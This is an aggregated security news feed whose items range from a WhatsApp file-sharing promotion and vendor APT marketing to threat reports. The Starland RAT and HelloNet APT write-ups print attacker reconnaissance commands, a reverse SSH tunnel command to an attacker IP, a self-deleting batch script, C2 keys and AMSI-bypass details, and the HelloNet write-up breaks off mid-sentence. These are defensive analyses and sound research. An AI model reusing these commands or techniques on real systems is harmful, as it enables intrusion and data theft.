News RGPD...

News RGPD

  • Citrix Secure Access Client Flaw Lets Low-Privileged Windows Users Gain SYSTEM Privileges
    par Eswar le 18 juillet 2026 à 7h11

    Cloud Software Group has issued a High-severity security bulletin (CTX696734) disclosing two vulnerabilities in the Citrix Secure Access Client for Windows and the Citrix Endpoint Analysis Client for Windows. The more serious of the two, tracked as CVE-2026-53565, allows a standard, low-privileged user on a local system to escalate privileges and gain full SYSTEM access, The post Citrix Secure Access Client Flaw Lets Low-Privileged Windows Users Gain SYSTEM Privileges appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Comment envoyer des fichiers sur WhatsApp ? Le guide complet pour contourner les limites
    par Ny Tiavina R. le 17 juillet 2026 à 19h10

    Qui n’a jamais ressenti une immense pointe de frustration en voyant s’afficher le message : « Le fichier est trop volumineux » ? Au quotidien, envoyer des fichiers sur WhatsApp est devenu un réflexe absolu pour partager un document de travail ou un souvenir de vacances. Pourtant, dès que l’on sort du cadre d’une simple photo compressée, l’application montre de sacrées faiblesses. Entre les plafonds de taille restrictifs et la compression destructrice qui transforme vos vidéos en bouillie de pixels, l’expérience vire rapidement au cauchemar. Heureusement, il existe des astuces natives cachées et des alternatives redoutables pour envoyer de gros fichiers sans sacrifier leur qualité d’origine. Notre recommandation : L’outil français Smash Lancée à Lyon en 2017, la plateforme française Smash s’est imposée comme l’un des outils les plus performants pour envoyer des fichiers volumineux sans bloquer vos messageries. Elle est aujourd’hui plébiscitée par plus de 8 millions d’utilisateurs et 30 000 entreprises. De plus, elle affiche une note exceptionnelle de 4,9/5 sur Trustpilot (sur plus de 38 000 avis). Elle brille par sa capacité à partager des documents lourds sur WhatsApp sans perte de qualité ni limite de poids. Grâce à un partenariat exclusif avec Publithings, utilisez le code LEBIGDATA pour obtenir 54 % de rabais sur les abonnements annuels et un mois d’essai gratuit. Découvrir Smash pour booster mes envois WhatsApp En cette année 2026, nos smartphones capturent des images en ultra-haute définition et des vidéos d’une clarté phénoménale. Le problème, c’est que les infrastructures des applications de messagerie peinent à suivre cette inflation de gigaoctets. Maîtriser l’art d’envoyer des fichiers sur WhatsApp de manière fluide est donc devenu indispensable pour préserver votre productivité et vos relations professionnelles. Les limites de WhatsApp : pourquoi vos partages de documents virent au fiasco Des plafonds de taille totalement obsolètes Si l’application brille par sa simplicité, elle impose en coulisses un traitement de texte et d’image particulièrement sévère qui bride la créativité des utilisateurs. Pour faire simple, les limites de WhatsApp évoluent régulièrement selon les versions de l’application. Si vous passez par l’onglet standard « Photos et Vidéos », la taille maximale est bloquée à 16 Mo. Autant dire qu’une vidéo en 4K est stoppée net au bout de quelques secondes. Pour pallier cela, l’application permet de tricher en passant par l’onglet « Document », ce qui pousse la limite théorique à 2 Go. Néanmoins, à l’heure des fichiers CAO, des bases de données massives ou des projets vidéo professionnels, ce plafond de 2 Go s’avère encore bien trop bas. Il génère une perte de temps considérable pour les équipes. Une compression algorithmique brutale et destructrice Au-delà du poids, c’est la qualité visuelle qui trinque. Pour économiser la bande passante de ses serveurs, la plateforme applique une compression automatique d’une violence rare. Vos clichés perdent instantanément leur piqué et leurs détails pour devenir flous. Ce phénomène est encore plus flagrant sur les vidéos, qui subissent des saccades ou des artefacts numériques grossiers après l’envoi. Pour un photographe, un graphiste ou un créateur de contenu, confier son travail à ce traitement algorithmique est tout simplement impensable. Envoyer de gros fichiers sur WhatsApp gratuitement avec Smash Le rejet catégorique de certains formats professionnels Le tableau se complique encore lorsque l’on aborde les extensions de fichiers. WhatsApp valide sans sourciller les formats standards comme le MP4 ou le PDF. En revanche, le système se montre extrêmement méfiant envers les fichiers bureautiques avancés. En guise d’exemple, la plateforme bloque ou affiche des messages d’avertissement inquiétants lors du transfert de fichiers contenant des macros (comme les extensions .docm ou .xlsm). Cette rigidité logicielle oblige à effectuer des conversions manuelles fastidieuses qui bousculent les mises en page et font perdre un temps précieux. Comment envoyer des fichiers sur WhatsApp avec la méthode officielle ? Si vos documents font moins de 2 Go et que vous souhaitez utiliser les fonctionnalités natives, voici la marche à suivre sur smartphone et ordinateur pour limiter la casse. La manipulation sur smartphone (Android et iOS) Ouvrez l’application et accédez à la discussion avec votre contact. Cliquez sur l’icône du + (sur iPhone) ou du trombone (sur Android) située à côté du champ de saisie. Ne choisissez pas « Photos et vidéos ». Sélectionnez impérativement l’option Document. Parcourez la mémoire interne de votre appareil, sélectionnez votre fichier lourd, puis validez. En passant par ce canal, WhatsApp enverra le fichier sous sa forme brute, sans détruire sa résolution. Les pièges de la version WhatsApp Web sur PC Si vous travaillez sur ordinateur, l’interface Web permet également le glisser-déposer de documents. Cependant, soyez vigilant : cette version est particulièrement sensible aux micro-coupures de réseau. Si votre connexion internet sautille pendant le transfert d’un gros fichier, l’envoi échoue instantanément et vous devez tout recommencer depuis le début. Envoyer de gros fichiers sur WhatsApp gratuitement avec Smash Smash : une alternative simple pour partager de gros fichiers sur WhatsApp Lorsque la méthode officielle montre ses limites, c’est ici qu’intervient Smash. Cette plateforme en ligne française a été pensée spécifiquement pour libérer vos flux de travail des contraintes de taille. [Fichier lourd sur votre appareil] ➔ [Dépôt sur Smash] ➔ [Génération d'un lien] ➔ [Partage direct sur le chat WhatsApp] Zéro inscription, zéro limite de taille La force absolue de Smash réside dans sa formule gratuite. Alors que de nombreuses plateformes de transfert fixent un plafond de taille pour leur offre gratuite, Smash autorise l’envoi de fichiers sans limite de poids. Toutefois, les partages qui dépassent 2 Go sont intégrés dans une file d’attente non prioritaire. L’utilisation est instantanée, ne nécessite pas la création d’un compte et respecte scrupuleusement votre anonymat. De plus, l’interface est totalement épurée et garantie sans publicités intempestives. Comment ça marche concrètement ? Le processus est d’une simplicité enfantine. Vous vous rendez sur le site, vous déposez vos documents (vidéos, dossiers compressés, PDF géants) sur le bouton central, et vous lancez le téléchargement. En quelques instants, la plateforme vous fournit un lien sécurisé unique. Il vous suffit de copier ce lien pour le coller directement dans votre messagerie WhatsApp. Votre correspondant clique simplement dessus pour récupérer les documents dans leur qualité d’origine. Il peut même prévisualiser les éléments avant de les enregistrer. Ainsi, si l’envoi contient plusieurs pièces, il est possible de télécharger uniquement les fichiers nécessaires. Cette méthode évite de saturer inutilement la connexion mobile (4G ou 5G) de votre destinataire. Envoyer de gros fichiers sur WhatsApp gratuitement avec Smash Une technologie souveraine, sécurisée et écoresponsable Transmettre des fichiers d’entreprise exige des garanties sérieuses en matière de confidentialité. Smash l’a parfaitement compris et se positionne comme un bouclier de confiance. Un chiffrement de haut niveau : Vos données sont cryptées en transit (SSL/TLS) et au repos grâce au standard militaire AES 256 bits. Souveraineté européenne : Les fichiers sont hébergés temporairement dans le datacenter le plus proche des utilisateurs (Paris, Francfort, Londres, Montréal, etc.). En plus d’optimiser la vitesse de transfert, ce système respecte le RGPD et évite l’application des lois extraterritoriales américaines. Une démarche écoresponsable : Partager un document via un lien Smash limite l’empreinte carbone du transfert. Selon une étude indépendante de 2023, cette pratique permet de réduire les émissions de $CO_2e$ de près de 90 %. Protection des données : Smash ne revend aucune donnée utilisateur. De plus, les fichiers partagés ne servent pas à entraîner des modèles d’intelligence artificielle. Passez à la vitesse supérieure avec les offres premium Si la version gratuite est parfaite pour un usage occasionnel, les professionnels apprécieront la puissance des options payantes. En utilisant le code promo LEBIGDATA, vous profitez de réductions exceptionnelles allant jusqu’à 54 % sur les abonnements, assorties d’un mois d’essai gratuit. Ces formules pro vous permettent de supprimer la file d’attente pour les fichiers de plus de 2 Go et de prolonger la durée de validité des liens. C’est également un véritable outil de communication, puisqu’il vous permet de personnaliser entièrement la page de téléchargement avec le logo et les couleurs de votre entreprise. Pendant que vos clients récupèrent leurs livrables, vous pouvez ainsi diffuser vos dernières actualités ou vidéos promotionnelles en arrière-plan. Qu’il s’agisse d’envoyer une vidéo 4K, un projet créatif ou un dossier de travail, l’utilisation d’un lien Smash permet de s’affranchir des limites de taille de WhatsApp. Vos fichiers conservent leur qualité d’origine. De plus, vous gardez un meilleur contrôle sur la durée de disponibilité de vos partages. FAQ : Vos questions fréquentes pour envoyer des fichiers sur WhatsApp Quelle est la taille maximale pour envoyer un fichier sur WhatsApp ? La limite est de 16 Mo pour les médias classiques (photos/vidéos). Elle monte jusqu’à 2 Go si vous utilisez l’option d’envoi sous forme de « Document ». Pour dépasser ce plafond, il faut utiliser un lien externe comme Smash. Pourquoi mes vidéos sont-elles floues sur WhatsApp ? L’application compresse fortement les fichiers vidéo afin de réduire leur poids et d’économiser de la bande passante. Pour conserver une qualité HD ou 4K, vous devez envoyer la vidéo en tant que « Document » ou partager un lien Smash. Envoyer de gros fichiers sur WhatsApp gratuitement avec Smash Peut-on partager un fichier confidentiel sur WhatsApp via Smash en toute sécurité ? Oui. Vos fichiers bénéficient d’un chiffrement. De plus, vous pouvez restreindre l’accès en ajoutant un mot de passe sur votre lien de téléchargement. Il est recommandé de communiquer ce code à votre destinataire via un autre moyen (SMS, téléphone) pour ne pas l’associer directement au lien de partage. Les fichiers envoyés sous forme de documents saturent-ils la mémoire du téléphone ? Oui, si votre correspondant télécharge un document de 2 Go directement dans l’application, l’espace de stockage de son smartphone sera fortement impacté. Passer par un lien externe lui permet de choisir ce qu’il souhaite stocker. Les documents transférés par Smash servent-ils à entraîner des IA ? Non. Smash n’exploite aucun fichier envoyé pour alimenter ou développer des modèles d’intelligence artificielle. Cet article Comment envoyer des fichiers sur WhatsApp ? Le guide complet pour contourner les limites a été publié sur LEBIGDATA.FR.

  • Tracking Advanced Persistent Threat Groups | Recorded Future
    le 17 juillet 2026 à 15h34

    Key takeaways Advanced Persistent Threats (APTs) are sophisticated, long-term cyber campaigns conducted by well-funded human adversaries (often nation-states) who target specific organizations for espionage, data theft, or critical infrastructure disruption. Traditional security tools often fail because APT groups bypass signature-based defenses by using customized malware and Living-off-the-Land (LotL) tactics that mimic legitimate user activity inside the network. Effective advanced persistent threat detection requires minimizing breakout time, the window between initial access and lateral movement, by identifying threats before they establish deep persistence. To defeat modern APTs, organizations must move from reactive internal monitoring to proactive threat intelligence, tracking adversary infrastructure on the open, deep, and dark web before an attack is launched. Modern organizations face highly resourceful, patient, and deeply calculated adversaries. This shift has ushered in an era of coordinated operations where elite threat actors don't just compromise a system and leave, but may spend weeks or months quietly surveying networks, mapping architecture, and identifying high-value targets. These operations are the hallmark of an advanced persistent threat (APT). Traditional cybersecurity frameworks have long relied on perimeter defenses designed to catch malicious activity at the gates. However, once an APT group breaches a network, they often intentionally manipulate native administrative tools and harvest legitimate credentials to blend into daily business traffic. To better confront an adversary that behaves like an insider, organizations must shift their perspective outward, leveraging real-time, external threat intelligence to identify and intercept cyber threats before they can establish a permanent foothold. What is an Advanced Persistent Threat (APT)? An APT is a sophisticated, prolonged cyber campaign executed by a highly organized group with specific, long-term objectives. Breaking down the acronym highlights the unique nature of these threats: Advanced: APT actors do not rely on off-the-shelf exploits. They frequently utilize customized malware, discover and weaponize zero-day vulnerabilities, and practice meticulous operational security (OpSec) to deliberately evade modern security controls. Persistent: Unlike cybercriminals who encrypt a server and immediately demand a ransom, APTs utilize a "low-and-slow" methodology. They prioritize stealth over speed, regularly remaining inside an environment for months to achieve strategic goals such as espionage, intellectual property theft, or the long-term disruption of critical infrastructure. Threat: Behind every APT is a well-funded organizational structure. These are not lone hackers; they are highly structured syndicates and state-sponsored units—such as the Lazarus Group or APT41—backed by massive financial and geopolitical resources. The multi-stage APT attack lifecycle Generally, APT groups do not operate at random. They follow a rigorous, multi-stage lifecycle. For defenders, understanding this timeline is critical to shrinking “breakout time"—the vital window between the initial compromise and the moment the attacker begins moving through the network. 1. Reconnaissance and planning Before a single line of malicious code is deployed, attackers gather open-source intelligence (OSINT), scan exposed internet-facing infrastructure, and map out the target’s digital footprint to find weak points. 2. Initial infiltration Attackers typically gain entry via hyper-targeted spear-phishing or social engineering campaigns, credential stuffing, or complex supply chain compromises, often bypassing standard authentication checks. 3. Establishing footholds Once inside, actors deploy stealthy backdoors and obfuscated rootkits. This ensures that even if security teams discover and close the primary entry vector, the attackers maintain alternative entry routes. 4. Lateral movement and escalation Adversaries navigate from system to system, harvesting administrative credentials and mapping Active Directory trust boundaries to compromise the enterprise network. 5. Data exfiltration or disruption The group gathers, stages, and quietly extracts sensitive data using encrypted command-and-control (C2) channels. In some cases, they may deploy ransomware or execute a DDoS attack as a distraction to cover their tracks. Why traditional advanced persistent threat detection isn’t enough For Cyber Threat Intelligence (CTI) teams, threat hunters, and SOC managers, keeping pace with APTs using legacy tools is an uphill battle. Traditional detection tools and processes consistently fail against advanced actors for several reasons: Signature-Based Defenses: Legacy firewalls and traditional antivirus rely on known file hashes. Because APT groups write custom code and heavily leverage Living-off-the-Land (LotL) tactics using native administrative tools, they can leave no traditional signatures behind. Dwell Time: Internal log correlation through SIEM and EDR platforms is inherently reactive. If your team is only looking at alerts generated inside your perimeter, the attacker may have already achieved a foothold and begun their mission. Alert Fatigue and Data Silos: SOC teams are often drowning in a sea of disconnected internal alerts. Without external context, it is nearly impossible to distinguish a routine network anomaly from an APT group spinning up a new unclassified C2 server. Fragmented Vendor Taxonomies: Tracking adversaries across the industry is notoriously confusing. One threat group might be designated by a weather pattern by one vendor, an animal by another, or a random number by a third, complicating cross-team collaboration and intelligence sharing. Shifting from reactive defense to real-time intelligence To better counter advanced persistent threats, organizations must meet bad actors earlier in the attack lifecycle. This means disrupting the adversary during their reconnaissance and infrastructure-staging phases, long before they ever execute an exploit on an internal endpoint.Real-time threat intelligence in the context of APTs means continuously harvesting, analyzing, and structuring data from across the open, deep, and dark web to monitor attackers as they build their technical infrastructure. By tracking newly registered domains, malicious IP allocations, and discussions on illicit forums, defenders can identify a threat actor's setup phase. Mapping these observations to the MITRE ATT&CK® framework allows security teams to decode the specific Tactics, Techniques, and Procedures (TTPs) of an adversary, enabling them to anticipate and block the attacker's next move. Mastering APT detection with Recorded Future Recorded Future equips threat hunters and CTI analysts with the visibility needed to track advanced persistent threats across every stage of the attack lifecycle. By centralizing automated collection and elite human analysis, Recorded Future converts massive volumes of public and dark web data into actionable, proactive defense. The Intelligence Graph® The Recorded Future Intelligence Graph® automatically maps, links, and updates relationships between billions of entities—including IPs, domains, malware strains, and threat groups—across massive global datasets in real time, giving defenders an unparalleled view of adversary infrastructure. Third-Party Risk Sophisticated threat actors frequently target weak links in an enterprise ecosystem. With Third-Party Risk, organizations gain real-time visibility into the security postures of their vendors, contractors, and partners, cutting off supply-chain entry vectors. Insikt Group® Recorded Future’s elite network of threat researchers, the Insikt Group, acts as an extension of your security team, providing the latest geopolitical intelligence. They deliver pre-vetted, highly contextual information and actionable hunting rules (including YARA, Sigma, and Snort) directly into the Platform, allowing security teams to rapidly deploy defenses against emerging state-sponsored campaigns. Recorded Future AI Generative AI capabilities reduce Mean Time to Respond (MTTR). Analysts can use natural language to query complex APT behaviors, instantly surface connection points, and generate comprehensive, shareable intelligence briefs in seconds, streamlining leadership communications during critical events. Staying one step ahead of cyber threats Advanced persistent threats win when they remain hidden in the noise of a network. True detection requires looking beyond internal firewalls and endpoints, demanding visibility into the external environments where adversaries plan, build, and launch their operations. In the face of highly organized, nation-state-backed syndicates, speed and visibility are the ultimate metrics of success. By shifting from a reactive internal posture to a proactive, real-time intelligence strategy, organizations can illuminate adversary infrastructure, disrupt the attack lifecycle, and secure their digital perimeter against even the most patient and well-resourced threat actors. Want to see how real-time intelligence can transform your threat hunting capabilities? Book a demo with Recorded Future today. FAQs What is the primary objective of an advanced persistent threat (APT) group? Unlike typical cybercriminals who seek immediate financial payouts through rapid encryption or ransomware, the primary objective of an APT group is usually long-term cyber espionage. Backed by nation-states or heavily funded syndicates, these actors aim to establish an undetected, prolonged presence within a target network to quietly steal intellectual property, harvest state secrets, or maintain access to critical infrastructure for future geopolitical leverage. Why is advanced persistent threat detection so difficult for traditional security tools? Traditional security tools rely heavily on static signatures—meaning they look for known, previously identified file hashes or malicious code patterns. APT actors easily bypass these defenses by writing customized malware, exploiting zero-day vulnerabilities, and using "Living-off-the-Land" (LotL) tactics that abuse legitimate system administration tools already built into your network. Because their activity mimics normal administrative tasks, they go unnoticed by internal firewalls. What is "breakout time," and why does it matter in tracking APTs? Breakout time is the critical window between an adversary's initial compromise of a single machine and their ability to move laterally to other systems on the network. For elite APT groups, this window can be incredibly tight. Tracking threat actor infrastructure in real time allows security teams to recognize the initial entry vector immediately and stop the actor before they can escalate privileges or move beyond the original target endpoint. How does generative AI improve advanced persistent threat detection? When a sophisticated attack is underway, speed is everything. AI capabilities allow security teams to instantly analyze, synthesize, and summarize vast amounts of complex threat data. Instead of spending hours manually combing through forensic logs and disparate threat intel feeds, analysts can use natural language queries to instantly understand an APT group's current TTPs, lowering the Mean Time to Respond (MTTR) from hours to seconds.

  • RGPD, datacenters et investissements : les propositions du rapport parlementaire pour la souveraineté numérique
    le 17 juillet 2026 à 14h12

    La commission d'enquête de l'Assemblée nationale a rendu cette semaine son rapport sur les vulnérabilités et dépendances numériques. Au terme d'un large tour d'horizon des acteurs du secteurs, les parlementaires avancent 29 propositions et 18 recommandations pour corriger le tir. 

  • Alerts on Server Loopback Traffic?
    par /u/Kind-Supermarket-452 le 17 juillet 2026 à 11h00

    If you were given the opportunity to chose how to better capture a breach in a device, server, endpoint, VM, etc, would you chose to capture the internal loopback communications happening in a flow capture/netflow. Here is the problem that I see it. 1.) Provides deeper intelligence to the inner workings of applications running on a server and could be used to detect malicious intent, BEFORE the threat actor had time to exfiltrate. 2.) Could result in massive SIEM storage bloat, but that could be managed with a properly tuned database system. 3.) Could result in highly skewed network statistics, given that is all intra-server communications. I would love to hear your thoughts. submitted by /u/Kind-Supermarket-452 [link] [comments]

  • New Russian Campaign Uses Fake Webex and Zoom Installers to Deploy Starland RAT
    par Pierluigi Paganini le 17 juillet 2026 à 9h11

    Russian-speaking UAT-11795 spreads trojanized Zoom, Webex, and MobaXterm installers to deliver Starland RAT and the WLDR memory-only implant. Cisco Talos researchers published a detailed technical report on July 16 disclosing UAT-11795, a financially motivated, Russian-speaking threat actor that has been running a malware campaign against users in the United States and Europe since at least June 2025. The operation distributes trojanized installers for software that IT professionals and developers actually use: MobaXterm, Cisco Webex, Zoom, DBeaver, and even the gaming platform FACEIT. “Cisco Talos is disclosing UAT-11795, a sophisticated, Russian-speaking, financially motivated adversary that has been conducting a malicious campaign targeting users in the U.S. and Europe since at least June 2025.” reads the report published by Talos. The wide range of targets, from developer tools and business collaboration software to gaming platforms, suggests the attackers are trying to infect many different types of users instead of focusing on a single industry. The campaign delivers two newly documented malware families. The first is Starland RAT, a Python-based remote access tool with credential theft and cryptocurrency wallet enumeration built in. The second is the WLDR agent, a PowerShell-based command-and-control implant that runs entirely in memory. Both are novel. Talos also observed the actor deploying CastleStealer and Remcos RAT as additional payloads delivered through Starland after initial compromise. Initial access appears to come through a ClickFix social engineering technique, where the victim is tricked into running a command that downloads and executes a malicious HTA file silently. That HTA file drops a Windows batch file and a trojanized installer, while simultaneously establishing persistence through a registry Run key that re-executes the HTA every time the user logs in. A Russian-language developer comment found inside the VBScript, “Добавление команды в автозапуск для текущего пользователя,” confirms the actors are Russian-speaking and, apparently, left their development notes in the deployed code. The trojanized installers are built using the Nullsoft Scriptable Install System. They package a real Python runtime alongside a compiled Python loader disguised as a file named LICENSE.txt. The NSIS script executes the loader, which decrypts Starland RAT using a single-byte XOR key and runs it directly in memory. The actual software installation proceeds normally, so the victim sees what they expected and has no reason to suspect anything happened. Before any network activity, Starland checks whether it’s running in a sandbox. It compares the logged-on username against a hardcoded list of known sandbox service accounts including WDAGUtilityAccount, then checks the computer name against hostnames from Cuckoo, Any.Run, Joe Sandbox, and Hybrid Analysis. It also checks for a Zone.Identifier alternate data stream on the installer file to confirm it was downloaded through a browser rather than dropped directly. Any mismatch terminates execution. “Before any malicious logic executes, the RAT conducts check for anti-analysis environments. First, it compares the logged-on username of the victim machine against a hardcoded list of usernames, which includes known sandbox service accounts and aliases, including WDAGUtilityAccount. Next, the RAT verifies the victim’s computer name against a list of hostnames from recognized sandbox environments, such as Cuckoo, Any.Run, Joe Sandbox, and Hybrid Analysis.” continues the report. “If either check matches, the RAT’s execution terminates immediately. Additionally, the RAT examines the Downloads folder for a Zone.Identifier alternate data stream on the trojanized installer file, confirming that the file was obtained via a browser download rather than being uploaded or copied directly.” After clearing those checks, the RAT establishes persistence before making any network calls, creating a scheduled task with a randomized name following the pattern PythonLauncher-{3 random characters} and a Startup folder shortcut as a secondary mechanism. It then runs reconnaissance: hardware ID derived from the C: drive volume serial number, total RAM, installed antivirus, and Active Directory membership. If the machine is domain-joined, it executes whoami, systeminfo, net user, and nltest to map the domain structure. It also enumerates over 40 cryptocurrency wallets from both browser extensions and desktop applications, takes a screenshot of the desktop, and bundles everything into a JSON payload that it XOR-encrypts with the key “helo1” before sending it to the C2. The C2 design is worth calling out. The RAT sends victim registration data to a hardcoded primary C2 domain, but if that fails, it uses a Polygon Ethereum smart contract as a backup. “If the primary C2 registration fails, the RAT enables a blockchain-anchored fallback mechanism. An eth_call is triggered via JSON-RPC to the public Polygon RPC endpoint “polygon-rpc[.]com”, targeting the smart contract “0x6ae382ed2154cc84c6672e4e908cd2c69c1b35ba” and function selector “0xc659f3b8” for the latest block.” states Talos. “The encrypted hexadecimal string that the RAT receives from the smart contract is XOR-decrypted with the key “$m7*rYpry3” to recover a fallback domain to which the RAT sends the victim machine registration request along with the reconnaissance and screenshot data.” Blocking a C2 domain doesn’t help if the fallback address lives on a public blockchain that you can’t take down. Before registering with the C2, the RAT sends a Telegram notification to an attacker-controlled bot with the victim’s public IP, OS details, processor information, computer name presented as a “Crew ID,” and any detected cryptocurrency wallets. Two Telegram bots are used: “skuefq_bot” and “komandastuk_bot.” Talos also found a private Telegram channel called “stuk komanda” created June 5, 2025, structured like a C2 dashboard, confirming the operation’s timeline. When Starland receives a shellexecute command from the C2, the actor can use it to deploy the WLDR framework. This arrives in three stages: a heavily obfuscated PowerShell stager, a downloader that fetches victim-specific payloads bound to the machine’s hardware ID, and the WLDR agent itself, which runs entirely in memory. “The WLDR agent is a fully featured PowerShell remote access client that operates entirely in memory. It implements encrypted C2 communications, concurrent task execution through a managed Runspace engine, and a module delivery framework that provides the threat actor with interactive remote PowerShell execution capabilities on the victim’s machine.” continues the report. The WLDR agent uses AES-256-CBC with HMAC-SHA256 for all communication, derives session keys through PBKDF2-SHA256 at 5,000 iterations, and masks its traffic with headers that mimic a Chrome 124 browser session. The Runspace engine supports up to 10 concurrent threads and streams output back to the C2 in real time as scripts execute rather than waiting for completion, making it suitable for interactive monitoring tasks. The C2 responds only to requests that carry a matching hardware ID, so probing the endpoint directly returns nothing useful. Starland also delivers CastleStealer, a .NET infostealer that targets browser credentials across the full Chromium family and Firefox, cryptocurrency wallet extensions, Discord and Telegram session files, and Steam credentials. It checks for a Russian locale and exits if it matches, which is consistent with the operator protecting their own environment. Remcos RAT is delivered through a separate 32-bit shellcode path. The custom shellcode loader that handles both payloads disables AMSI and ETW at runtime by patching the first bytes of AmsiScanBuffer and EtwEventWrite in memory, then falls back to a VirtualProtect-based write if the primary patching fails, before decompressing and injecting the final payload using reflective PE injection or .NET CLR loading depending on the payload type. The full indicator set including domains, IPs, file hashes, and Snort rule IDs is available in Talos’ GitHub repository linked from the report. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, UAT-11795)

  • Pseudpocalypse
    le 16 juillet 2026 à 20h59

    Comments

  • New Exploitable BOLA Found in Immich (self-hosted media platform)
    par /u/EscapeSecurity le 16 juillet 2026 à 17h43

    Full disclosure I'm at Escape but wanted to share something we found that would be interesting to those here! Escape's security research team found a Broken Access Control flaw in Immich which let any user read photos in a locked folder without the required PIN. Immich is a self-hosted media platform with 100k+ stars on GitHub. Their "locked folder" hides sensitive assets behind a PIN-elevated session. What we found: Four of the five search endpoints enforce that; POST /search/random doesn't. If you send it with the visibility field simply omitted and it returns the caller's locked assets from a session that never entered the PIN, and, with a partner relationship, the partner's locked assets too. If you're interested in how we did it or how you can reproduce it yourself the full breakdown with reproduction instructions is linked! And if anyone has any questions we would love to answer them. submitted by /u/EscapeSecurity [link] [comments]

  • HelloNet campaign — new malicious modules launched through the ViPNet update system
    par Konstantin Isakov, Georgy Kucherin, Anton Kargin le 16 juillet 2026 à 14h53

    UPD 16.07.2026: Added detection rules and examples using KEDR Expert. UPD 16.07.2026: Added detection of the malicious campaign in network traffic using Kaspersky Anti Targeted Attack (KATA) with the NDR module. UPD 16.07.2026: Updated the list of Indicators of Compromise (IoCs) and TTPs. We discovered a new APT attack using previously unknown tooling, which started at least in May 2026 and remains active at the time of publication. It is notable in that the implants used during it were launched through the ViPNet update system (a software suite for creating secure networks). During our research, we identified attempts of targeted infection of large Russian organizations from the government, energy, transport, education, and logistics sectors, as well as industry. This is not the first time an advanced group has targeted computers connected to ViPNet networks. For example, last year we discovered a complex backdoor mimicking ViPNet updates. Persistence via the update system On one of the analyzed systems, we identified a malicious file named wtsapi32.dll in the directory C:\Program Files (x86)\InfoTeCS\VIPNet Update System, which belongs to the ViPNet suite update system. By placing the file in this directory, the attackers implement the DLL Sideloading technique — the ViPNet update system executable file itcsrvup64.exe, which is launched at OS startup, is susceptible to it. Thus, during this attack, the attackers tried to implement persistence on the system through the ViPNet software update component. HelloInjector — a loader for additional malicious components The wtsapi32.dll component is a loader, which we named HelloInjector. Its main goal is to inject its code into the svchost.exe process and launch the malicious payload. After launch, the malware checks the process in the context of which it was launched. If the name of the main process is not svchost.exe, the loader starts iterating through all processes running in the operating system. It looks for a process whose name contains the string svchost, and the command line contains the string netsvcs. If such a process is found, the loader injects itself into the target process using the NtWriteVirtualMemory and NtCreateThreadEx functions. After restarting in the new process, the loader checks the process name again for the presence of the string svchost. Having confirmed the successful check, HelloInjector loads and executes the malicious payload in memory, which is stored in its body in plain text. HelloProxy — a tool for traffic proxying and launching new malicious payloads The malicious payload, which we named HelloProxy, is simultaneously a hidden proxy and a loader for the following modules sent by the command server. It works by intercepting the NtDeviceIoControlFile, closesocket, and shutdown functions. Their interception is carried out using the Microsoft Detours library. The handlers of the closesocket and shutdown functions prevent the premature closing of sockets used for interaction with the C2. In turn, the handler of the NtDeviceIoControlFile function contains the main malicious logic. Its code implements the interception of two IOCTL codes: AFD_RECV (0x12017) AFD_GET_TDI_HANDLES (0x12037) These codes are used during socket operations — their interception allows the malware to hinder security solutions operating in user mode for filtering network connections. Kaspersky security solutions detect such activity and prevent infection attempts at all stages. The AFD_GET_TDI_HANDLES handler is responsible for socket registration, and the AFD_RECV handler initiates the processing of incoming traffic. It is worth noting that every incoming message that triggered the processing of the AFD_RECV code is logged to the file C:\users\public\tesh4RPC.txt in the format:threadid: <Thread ID> pid=<PID>\r\nAfter installing the interceptors, the malware starts listening on ports 5003 and 5060 in anticipation of the first commands from the C2 server. In order to distinguish the command server traffic from the rest of the traffic, the implant implements a handshake process: it sends two bytes 0x0502 through the socket and expects to receive a message containing the string ASDFASFSAFASDF. After the successful completion of the handshake, the processing of incoming commands continues. Depending on the received command, there are two execution branches: Working as a proxy. The malware accepts strings in the following format: <ip_addr>:<port> Afterwards, it creates new sockets and starts forwarding traffic between them. Working as a loader. The malware accepts an executable file from the command server, after which it loads it into the memory of its own process and launches it in a separate thread. During the research, we managed to discover two malicious payloads that were injected into the svchost process, likely as a result of the previously described loader’s operation: An implant, which we named HelloExecutor, with the help of which attackers can execute commands on the infected system; A module for cleaning ViPNet software log files, which we named HelloCleaner. It allows hiding the attackers’ actions in the system. We established that the HelloExecutor backdoor was used for reconnaissance in the networks of infected organizations. The following shell commands were executed:query user ipconfig /all ping 8.8.8.8 -n 1 net user /do net group /do dir "C:\Program Files (x86)" dir "C:\Program Files (x86)\infotecs\" dir "C:\Program Files (x86)\infotecs\ViPNet Administrator" dir "C:\Program Files (x86)\infotecs\ViPNet Client\Export" dir "C:\Program Files (x86)\infotecs\ViPNet Client" dir "С:\ProgramData\Infotecs\ViPNet Administrator\kc\Export\" dir "$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network <номер сети удален>" dir c:\users\[username] query user dir C:\Users\Public\musicIn these commands, the mention of the directory C:\Users\Public\Music is notable. We established that on infected machines, the attackers used this directory when launching an SSH tunnel from the infected infrastructure to the attackers’ command server (5.39.253[.]206). The attackers launched a renamed executable file of the legitimate PuTTY utility (a client for various remote access protocols):C:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted] HelloBackdoor — a Rust-based backdoor for file system manipulations In addition to this, a backdoor written in the Rust language, which we named HelloBackdoor, was discovered on one of the infected systems. It accepts connections on port 443, waiting for the string 47c6235b4d2611184 (the second half of the MD5 hash of the string “hello\n“) to activate the backdoor. This backdoor further accepts the following commands: !upload — upload a file to the infected machine !down — download a file from the infected machine !stop — stop the backdoor’s operation. For this, a BAT file is created and executed with the following content:@echo off :loop if exist <selfpath> ( del /F /Q <selfpath> if exist <selfpath> goto loop ) sc stop iplircontrol >nul timeout 5 > nul sc start iplircontrol > nul (goto) 2>nul & del /F /Q %0If the command text did not match the above listed, the command is executed using cmd.exe. Attribution During the analysis of one of the wtsapi32.dll file samples, we found an unused string:GET / HTTP/1.1\r\nHost: news.sina.com\r\nConnection : keep - alive\r\nUpgrade - Insecure - Requests : 1\r\nUser - Agent : Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 145.0.0.0 Safari / 537.36 Edg / 145.0.0.0\r\nAccept : text / html, application / xhtml + xml, application / xml; q = 0.9, image / avif, image / webp, image / apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nIt refers to the news portal sina.com, which is popular in China. In addition, 